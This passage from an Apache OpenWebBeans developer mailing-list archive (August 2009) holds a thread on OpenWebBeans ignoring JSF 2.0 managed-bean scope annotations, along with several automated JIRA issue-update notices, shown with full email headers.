r5m0HsZHXPQk6M/qCYv+kYAVz/f8zUz3mUSVPfD6FZSjTFmdT++bUhj7ONcGCqz/LcqZ nTwKDpH+Y+TWOCeZBVrI4Uqd2u8ejIJlG1j7k= Received: by 161.129.204.104 with SMTP id u31mr3175502muk.93.1251318602744; Wed, 26 Aug 2009 13:30:02 -0700 (PDT) Received: from ?161.129.204.104? (e177199044.adsl.alicedsl.de [161.129.204.104]) by mx.google.com with ESMTPS id 12sm8505223muq.29.2161.129.204.104.30.01 (version=TLSv1/SSLv3 cipher=RC4-MD5); Wed, 26 Aug 2009 13:30:02 -0700 (PDT) Message-Id: <[email protected]> From: Sven Linstaedt <[email protected]> To: "[email protected]" <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit X-Mailer: iPhone Mail (7A400) Mime-Version: 1.0 (iPhone Mail 7A400) Subject: Re: WebBeans "eating" JSF 2.0 annotations ? Date: Wed, 26 Aug 2009 22:30:08 +0200 References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org I think the problem with jetty:run is it uses ./target/classes as webapplication's classpath instead of ./WEB-INF/classes which is searched through by the class scanner. Sven Am 26.08.2009 um 18:09 schrieb Mark Struberg <[email protected]>: > are you running this from the commandline or from within eclipse? > > I know that m2eclipse handles the classpath providing a bit > different... > > LieGrue, > strub > > --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: > >> From: Matthias Wessendorf <[email protected]> >> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? >> To: [email protected] >> Date: Wednesday, August 26, 2009, 5:57 PM >> mvn jetty:run-exploded fixes that. I >> guess that's JSF's problem (I am >> currently using the RI) >> >> Oh boy! :) >> >> On Wed, Aug 26, 2009 at 5:45 PM, Matthias Wessendorf<[email protected] >> > >> wrote: >>> On Wed, Aug 26, 2009 at 5:39 PM, Mark Struberg<[email protected]> >> wrote: >>>> In fact we (OWB) should provide standard context >> implementations for JSF annotated scopes. >>>> >>>> The whole picture: >>>> >>>> .) JSF scanns the classpath for JSF annotations >>>> >>>> .) OWB scanns the classpath for JSR-299 >> annotations >>>> >>>> In fact, I assume (not having looked at the code) >> that MyFaces provides kind of a mini DI container in the EL >> code. So any EL which will get through to the faces EL >> handler will successfully resolve those scoped beans >>>> >>>> Otoh, OWB also provides an EL handler which is >> dominant (prior in the EL chain). OWB currently simply >> ignores the javax.faces.scope annotations since they are >> 'unknown' for OWB. So this very class will look like a bean >> which has no [email protected]. >>>> >>>> >>>> The problem arises latest if JSF scoped beans need >> to be injected into JSR-299 beans and vice versa... >>>> >>>> an idea how to resolve this: >>>> We need to provide context implementations for the >> faces scopes in the webbeans-jsf module and let OWB do all >> the resolving. >>>> >>>> wdyt? >>> >>> yes, that's true. It is really a PITA to have three >> different ways to >>> @inject stuff (in JavaEE - well the >> javax.faces.bean.** stuff is >>> optional) >>> >>> I am pretty sure this will actually cause lot's of >> pain, trouble and >>> bad blogs on JavaEE 6 (heck, deserved! :-) ) >>> >>> Are you able to bring this dilemma up on some EG ? >>> (mismatch of all the stuff) >>> >>> -Matthias >>> >>>> >>>> LieGrue, >>>> strub >>>> >>>> >>>> --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> >> wrote: >>>> >>>>> From: Matthias Wessendorf <[email protected]> >>>>> Subject: Re: WebBeans "eating" JSF 2.0 >> annotations ? >>>>> To: [email protected] >>>>> Date: Wednesday, August 26, 2009, 5:26 PM >>>>> On Wed, Aug 26, 2009 at 5:23 PM, >>>>> Matthias Wessendorf<[email protected]> >>>>> wrote: >>>>>> On Wed, Aug 26, 2009 at 5:17 PM, Mark >> Struberg<[email protected]> >>>>> wrote: >>>>>>> for what I know (discussion on >> wb-dev) JSF apps >>>>> should use JSR-299 @ScopeType annotated scopes >> (renamed to >>>>> @NormalScope in the latest spec) and not faces >> scopes. I did >>>>> hope that we could unify all scopes by >> generally using >>>>> JSR-330 javax.inject.Scope in all EE fields. >> But that will >>>>> not work until JSR-299 also recognizes and >> treats JSR-330 >>>>> scopes as normal scopes. >>>>>>> >>>>>> >>>>>> WTF ? :) >>>>>> >>>>>> It is kinda odd that JSF 2.0 has should >> use the 299 >>>>> stuff. Standalone, >>>>>> ok all fine (not tested). >>>>>> But even if there are both in the game >> jsf2.0 and 299, >>>>> they should >>>>>> just work (or at least I should >>>>>> get a warning that the bean is using a >> (good) -sorry- >>>>> incorrect... annotation. >>>>>> >>>>>> Basically this is a total mess. >> Annontations work >>>>> standalone, but not >>>>>> when adding some heavyweight >>>>>> stuff (like 299) to the game ? Oh boy... >>>>> >>>>> I am pretty sure that this will introcude a >> lot of fun to >>>>> folks >>>>> writing JSF 2.0 applications, >>>>> if your statement is true. That would worse >> than the JSP >>>>> 2.1 >>>>> dependency (with JSF 1.2) >>>>> >>>>> I filed this bug: >>>>> https://issues.apache.org/jira/browse/OWB-133 >>>>> >>>>> At least there should be some help. Not >> everybody is >>>>> thrilled to >>>>> replace annotations based on >>>>> the environment (at least not me) >>>>> >>>>>> >>>>>> -Matthias >>>>>> >>>>>>> LieGrue, >>>>>>> strub >>>>>>> >>>>>>> >>>>>>> --- On Wed, 8/26/09, Matthias >> Wessendorf <[email protected]> >>>>> wrote: >>>>>>> >>>>>>>> From: Matthias Wessendorf <[email protected]> >>>>>>>> Subject: Re: WebBeans "eating" >> JSF 2.0 >>>>> annotations ? >>>>>>>> To: [email protected] >>>>>>>> Date: Wednesday, August 26, 2009, >> 5:11 PM >>>>>>>> has no effect. The beast can't >> find >>>>>>>> the JSF beans. >>>>>>>> Due to lack of time, I am going >> with JSF 2.0 >>>>> standalone. >>>>>>>> >>>>>>>> Question is: as it was working >> the current >>>>> behavior is a >>>>>>>> regression, >>>>>>>> has there been any testing on OBW >> + JSF 2.0 ? >>>>>>>> >>>>>>>> -Matthias >>>>>>>> >>>>>>>> On Wed, Aug 26, 2009 at 3:45 PM, >> Gurkan >>>>> Erdogdu<[email protected]> >>>>>>>> wrote: >>>>>>>>> It must not eat. >>>>>>>>> >>>>>>>>> But one point, >>>>>>>>> >>>>>>>>> You still use old XML >> configuration file >>>>> format. As a >>>>>>>> default OWB uses new >>>>>>>>> XML format. Add >>>>>>>>> https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties >>>>>>>>> >>>>>>>>> in your project >>>>> resources/META-INF/openwebbeans folder >>>>>>>> and sure that all >>>>>>>>> libraries are ok. >>>>>>>>> >>>>>>>>> You can look necessary libs >> from >>>>> guess.war . You can >>>>>>>> create it from mvn >>>>>>>>> package -Pjetty. >>>>>>>>> >>>>>>>>> --Gurkan >>>>>>>>> >>>>>>>>> >>>>>>>>> 2009/8/26 Matthias >> Wessendorf <[email protected]> >>>>>>>>> >>>>>>>>>> Hi, >>>>>>>>>> >>>>>>>>>> is it possible that the >> current trunk >>>>> is _eating_ >>>>>>>> JSF 2.0 annotations ? >>>>>>>>>> >>>>>>>>>> <someCode> >>>>>>>>>> ... >>>>>>>>>> import >> javax.faces.bean.ManagedBean; >>>>>>>>>> import >>>>> javax.faces.bean.SessionScoped; >>>>>>>>>> >>>>>>>>>> >> @ManagedBean(name="playersBean") >>>>>>>>>> @SessionScoped >>>>>>>>>> public class >> ViewParamsBean >>>>>>>>>> { >>>>>>>>>> ... >>>>>>>>>> </someCode> >>>>>>>>>> >>>>>>>>>> In June (before >> reflecting the >>>>>>>> javax.enterprise.context changes) >> it was >>>>>>>>>> working. >>>>>>>>>> Now expressions like >> #{playersBean} >>>>> are simply >>>>>>>> ignored ;-) >>>>>>>>>> >>>>>>>>>> Demo project is here: >>>>>>>>>> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >>>>>>>>>> >>>>>>>>>> -Matthias >>>>>>>>>> >>>>>>>>>> >>>>>>>>>> -- >>>>>>>>>> Matthias Wessendorf >>>>>>>>>> >>>>>>>>>> blog: http://matthiaswessendorf.wordpress.com/ >>>>>>>>>> sessions: http://www.slideshare.net/mwessendorf >>>>>>>>>> twitter: http://twitter.com/mwessendorf >>>>>>>>>> >>>>>>>>> >>>>>>>>> >>>>>>>>> >>>>>>>>> -- >>>>>>>>> Gurkan Erdogdu >>>>>>>>> http://gurkanerdogdu.blogspot.com >>>>>>>>> >>>>>>>> >>>>>>>> >>>>>>>> >>>>>>>> -- >>>>>>>> Matthias Wessendorf >>>>>>>> >>>>>>>> blog: http://matthiaswessendorf.wordpress.com/ >>>>>>>> sessions: http://www.slideshare.net/mwessendorf >>>>>>>> twitter: http://twitter.com/mwessendorf >>>>>>>> >>>>>>> >>>>>>> >>>>>>> >>>>>>> >>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> Matthias Wessendorf >>>>>> >>>>>> blog: http://matthiaswessendorf.wordpress.com/ >>>>>> sessions: http://www.slideshare.net/mwessendorf >>>>>> twitter: http://twitter.com/mwessendorf >>>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Matthias Wessendorf >>>>> >>>>> blog: http://matthiaswessendorf.wordpress.com/ >>>>> sessions: http://www.slideshare.net/mwessendorf >>>>> twitter: http://twitter.com/mwessendorf >>>>> >>>> >>>> >>>> >>>> >>> >>> >>> >>> -- >>> Matthias Wessendorf >>> >>> blog: http://matthiaswessendorf.wordpress.com/ >>> sessions: http://www.slideshare.net/mwessendorf >>> twitter: http://twitter.com/mwessendorf >>> >> >> >> >> -- >> Matthias Wessendorf >> >> blog: http://matthiaswessendorf.wordpress.com/ >> sessions: http://www.slideshare.net/mwessendorf >> twitter: http://twitter.com/mwessendorf >> > > > From [email protected] Wed Aug 26 20:47:43 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10119 invoked from network); 26 Aug 2009 20:47:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 20:47:43 -0000 Received: (qmail 77192 invoked by uid 500); 26 Aug 2009 20:47:43 -0000 Delivered-To: [email protected] Received: (qmail 77172 invoked by uid 500); 26 Aug 2009 20:47:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77162 invoked by uid 99); 26 Aug 2009 20:47:43 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 20:47:43 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f224.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 20:47:33 +0000 Received: by fxm24 with SMTP id 24so419085fxm.12 for <[email protected]>; Wed, 26 Aug 2009 13:47:12 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:x-mailer :mime-version:subject:date:references; bh=1HJQdyhLGdmfsIzfBBau7o+ia+E7nkM2+dwEdYZ0gGQ=; b=i6voS5R7OE0olM9Uix5zNF1tAHcmtWI+AxS18q995Pw6G7SrQdLnFy/A85SjGxqGUL M1UO305EvHq4zMKDkr+qLvEi1IXiAtwKRTNjvaydmkpqjX3RV79QNKbffjMrfYDozENs 08/j3U9uLeAB5cbyC9GBZlCT8voLk903mxMgc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:x-mailer:mime-version:subject:date :references; b=lNfoFCGoSksQpkT2uPpY5UYcNSPPdQbQWDE45hiocUWn97ut7gOe0NkdPR4nX4Qj9S HzfP7g/5L3Sn7LJN8B0UtAutG6b6C78KxE01Ce/DaNkefssZop8MWEN0+sC4bCDPjtS0 /GO3tM2pp8oR7QYfmMI36dprFNY2W2lKTdO5w= Received: by 161.129.204.104 with SMTP id z5mr3841637mum.11.1251319631868; Wed, 26 Aug 2009 13:47:11 -0700 (PDT) Received: from ?161.129.204.104? (e177199044.adsl.alicedsl.de [161.129.204.104]) by mx.google.com with ESMTPS id 12sm8599128muq.29.2161.129.204.104.47.10 (version=TLSv1/SSLv3 cipher=RC4-MD5); Wed, 26 Aug 2009 13:47:11 -0700 (PDT) Message-Id: <[email protected]> From: Sven Linstaedt <[email protected]> To: "[email protected]" <[email protected]> In-Reply-To: <{{EMAIL+PHONE}}> Content-Type: text/plain; charset=us-ascii; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit X-Mailer: iPhone Mail (7A400) Mime-Version: 1.0 (iPhone Mail 7A400) Subject: Re: WebBeans "eating" JSF 2.0 annotations ? Date: Wed, 26 Aug 2009 22:47:21 +0200 References: <{{EMAIL+PHONE}}> X-Virus-Checked: Checked by ClamAV on apache.org Nevertheless in which package and jar these annotations resides, I would like to see Application-, Session-, Request-, Conversation-, Flash- and ViewScope in one Place and instances residing in these scopes being injectable in each other. If one uses a scope not available in the given environment, an exception could be thrown during deployment time. Sven Am 26.08.2009 um 18:28 schrieb Mark Struberg <[email protected]>: >> Imagine you don't use EJB or anything else from JAvaEE, >> just JSF (and >> a servlet container). A dependency to 299-impl is a little >> heavy, right ? > > I didn't say webbeans-impl, but only the jsr299-api package! > This only contains annotations and a few interfaces, so you won't > get any additional dependendies. > > LieGrue, > strub > > > --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: > >> From: Matthias Wessendorf <[email protected]> >> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? >> To: [email protected] >> Date: Wednesday, August 26, 2009, 6:10 PM >> On Wed, Aug 26, 2009 at 6:05 PM, Mark >> Struberg<[email protected]> >> wrote: >>> Matze, >>> I think this would all become ok if _all_ the EE6 >> parts will simply use the JSR-330 javax.inject.Scope >> annotation as basis for their scopes. >> >> +1 >> >>> This would make at least the classpath scanning part a >> hell lot easier (the context implementation in the >> background still needs to be coded for each DI part, >>> because there is no API defined for it except in >> JSR-299). >> >> I agree >> >>> >>> >>> I already tried to convince Gavin and Pete to at least >> use @Scope for JSR-299 scopes, but they refused so far. I >> hope that there will be a really well founded _technical_ >> discussion on this topic in the very near future though! >>> >> >> +1 this is all political issues... sucks for the poor >> developers. >> >>> My 'vision': >>> >>> *) JSR-330 defines the basic annotations for DI in >> Java generally >>> *) JSR-299 defines the annotations for EE related >> stuff (@SessionScoped, RequestScoped) BASED ON JSR-330! >>> *) JSF2 uses the @SessionScoped from JSR-299. Why >> should JSF define own annotations? Even if you don't like to >> use any 299 container, you may still use the annotations >> defined in the API and provide an own small DI like MyFaces >> does it right now. Don't know if it makes sense at all to >> reinvite the wheel 10000 times... ;) >>> >> >> Imagine you don't use EJB or anything else from JAvaEE, >> just JSF (and >> a servlet container). A dependency to 299-impl is a little >> heavy, >> right ? >> >> Heck, what we need is clean, simple and extensible >> injection >> "container" in SE land. Which is the base for every damn >> thing. >> >> -Matthias >> > > > > From [email protected] Sat Aug 29 22:53:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41090 invoked from network); 29 Aug 2009 22:53:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2009 22:53:56 -0000 Received: (qmail 29784 invoked by uid 500); 29 Aug 2009 22:53:56 -0000 Delivered-To: [email protected] Received: (qmail 29751 invoked by uid 500); 29 Aug 2009 22:53:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29738 invoked by uid 99); 29 Aug 2009 22:53:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:53:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:53:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D1DFB234C046 for <[email protected]>; Sat, 29 Aug 2009 15:53:32 -0700 (PDT) Message-ID: <845378144.1251586412858.JavaMail.jira@brutus> Date: Sat, 29 Aug 2009 15:53:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-6) Scope passivation MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-6?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-6: ----------------------------- Affects Version/s: M3 Fix Version/s: (was: M3) M4 Fixed to M4. > Scope passivation > ----------------- > > Key: OWB-6 > URL: https://issues.apache.org/jira/browse/OWB-6 > Project: OpenWebBeans > Issue Type: Task > Components: Context and Scopes > Affects Versions: M3 > Reporter: Gurkan Erdogdu > Fix For: M4 > > > Implement scope passivation handling for passivating scopes. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Aug 29 22:55:04 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41205 invoked from network); 29 Aug 2009 22:55:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2009 22:55:04 -0000 Received: (qmail 29903 invoked by uid 500); 29 Aug 2009 22:55:04 -0000 Delivered-To: [email protected] Received: (qmail 29867 invoked by uid 500); 29 Aug 2009 22:55:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29847 invoked by uid 99); 29 Aug 2009 22:55:04 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:55:04 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:53:52 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B83DF234C004 for <[email protected]>; Sat, 29 Aug 2009 15:53:32 -0700 (PDT) Message-ID: <1665324179.1251586412747.JavaMail.jira@brutus> Date: Sat, 29 Aug 2009 15:53:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-47) Java EE Resource Injection Support In-Reply-To: <1837617456.1232213942069.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-47?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-47. ----------------------------- Resolution: Fixed Resolved for OpenEJB and standalone > Java EE Resource Injection Support > ---------------------------------- > > Key: OWB-47 > URL: https://issues.apache.org/jira/browse/OWB-47 > Project: OpenWebBeans > Issue Type: Task > Components: Java EE Integration > Affects Versions: M1 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > Java EE Resource Injection support. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Aug 29 22:55:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41290 invoked from network); 29 Aug 2009 22:55:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2009 22:55:54 -0000 Received: (qmail 30082 invoked by uid 500); 29 Aug 2009 22:55:54 -0000 Delivered-To: [email protected] Received: (qmail 30049 invoked by uid 500); 29 Aug 2009 22:55:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30039 invoked by uid 99); 29 Aug 2009 22:55:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:55:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:55:52 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C8AB6234C046 for <[email protected]>; Sat, 29 Aug 2009 15:55:32 -0700 (PDT) Message-ID: <857736603.1251586532821.JavaMail.jira@brutus> Date: Sat, 29 Aug 2009 15:55:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-59) Review the handling of ConversationScope timeouts In-Reply-To: <1395786909.1232570279643.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-59?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-59. ----------------------------- Resolution: Fixed > Review the handling of ConversationScope timeouts > ------------------------------------------------- > > Key: OWB-59 > URL: https://issues.apache.org/jira/browse/OWB-59 > Project: OpenWebBeans > Issue Type: Bug > Components: Lifecycle > Affects Versions: M2 > Reporter: Mark Struberg > Assignee: Gurkan Erdogdu > Fix For: M3 > > > How do we cope with ConversationScope terminations? > Is there a hook where applications can add theirselfs for being notificated about conversation timeouts, etc? > Is this defined in the Spec somewhere? -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Aug 29 22:55:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41294 invoked from network); 29 Aug 2009 22:55:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2009 22:55:54 -0000 Received: (qmail 30131 invoked by uid 500); 29 Aug 2009 22:55:54 -0000 Delivered-To: [email protected] Received: (qmail 30098 invoked by uid 500); 29 Aug 2009 22:55:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30083 invoked by uid 99); 29 Aug 2009 22:55:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:55:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:55:52 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B5293234C004 for <[email protected]>; Sat, 29 Aug 2009 15:55:32 -0700 (PDT) Message-ID: <291204591.1251586532737.JavaMail.jira@brutus> Date: Sat, 29 Aug 2009 15:55:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-92) facor out all EJB specific parts into an own maven module In-Reply-To: <892096613.1240189847407.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-92?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-92. ----------------------------- Resolution: Fixed > facor out all EJB specific parts into an own maven module > --------------------------------------------------------- > > Key: OWB-92 > URL: https://issues.apache.org/jira/browse/OWB-92 > Project: OpenWebBeans > Issue Type: Improvement > Affects Versions: M1 > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M3 > > > all EJB related stuff has to be moved out from webbeans-impl to an own plugin module -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Aug 29 22:55:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41298 invoked from network); 29 Aug 2009 22:55:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2009 22:55:56 -0000 Received: (qmail 30181 invoked by uid 500); 29 Aug 2009 22:55:56 -0000 Delivered-To: [email protected] Received: (qmail 30148 invoked by uid 500); 29 Aug 2009 22:55:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30138 invoked by uid 99); 29 Aug 2009 22:55:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:55:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:55:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D0348234C055 for <[email protected]>; Sat, 29 Aug 2009 15:55:32 -0700 (PDT) Message-ID: <1453202740.1251586532852.JavaMail.jira@brutus> Date: Sat, 29 Aug 2009 15:55:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-98) Check ManagedBean Public Field In-Reply-To: <1446444782.1245443167416.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-98?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-98: ------------------------------ Fix Version/s: (was: M3) M4 Fixed to M4 > Check ManagedBean Public Field > ------------------------------ > > Key: OWB-98 > URL: https://issues.apache.org/jira/browse/OWB-98 > Project: OpenWebBeans > Issue Type: Improvement > Components: Simple Web Beans > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > If a managed bean has a public field, it must have scope @Dependent. If a managed bean with a public field declares any > scope other than @Dependent, the container automatically detects the problem and treats it as a definition error, as defined > in Section 12.4, "Problems detected automatically by the container". -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Aug 29 22:57:57 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41373 invoked from network); 29 Aug 2009 22:57:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2009 22:57:57 -0000 Received: (qmail 30357 invoked by uid 500); 29 Aug 2009 22:57:57 -0000 Delivered-To: [email protected] Received: (qmail 30324 invoked by uid 500); 29 Aug 2009 22:57:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30311 invoked by uid 99); 29 Aug 2009 22:57:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:57:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:57:54 +0000 Received: from brutus (localhost [161.129.204.104]) by 